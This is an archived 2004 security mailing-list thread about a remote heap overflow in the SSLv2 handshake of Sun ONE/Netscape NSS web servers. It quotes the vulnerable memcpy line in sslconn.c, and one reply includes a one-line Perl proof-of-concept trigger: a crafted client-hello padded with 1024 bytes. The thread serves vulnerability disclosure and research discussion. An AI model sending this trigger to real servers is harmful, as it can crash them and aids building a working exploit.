Dailydave mailing list archives
Re: new ssl bug in Sun web servers
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Mon, 23 Aug 2004 18:45:01 -0500
Heap smashing fun on SunOne 6.1 (Win32). What non-Sun applications use the NSS library for the server side? Sans the "server" and "selfserve" apps that come with NSS, I wasn't able to find much that used this part of it. For the impatient/lazy: my $hello_goodbye = "\x84\x0c\x01\x00\x02\x00\x03\x00\x00\x04\x00\x07\x00\xc0". ("X" x 1024); -HD On Monday 23 August 2004 17:07, Evgeny Demidov wrote:
On Mon, 23 Aug 2004 16:27:38 -0400 Dave Aitel <dave () immunitysec com> wrote: http://xforce.iss.net/xforce/alerts/id/180 Author: Mark Dowd Bug in: SSLv2 handshake of Netscape Enterprise Server (and other related products) Type: Remote heap overflow. Go Mark! :>Hmm, this nice bug which really looks like a backdoor for me has been found during 10 minut NSS audit and given to VD about month ago ;-) sslconn.c: /* Squirrel away the challenge for later */ PORT_Memcpy(ss->sec.ci.clientChallenge, challenge, challengeLen); Best regards -Evgeny Demidov _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- new ssl bug in Sun web servers Dave Aitel (Aug 23)
- Re: new ssl bug in Sun web servers Evgeny Demidov (Aug 23)
- Re: new ssl bug in Sun web servers H D Moore (Aug 23)
- Re: new ssl bug in Sun web servers Evgeny Demidov (Aug 23)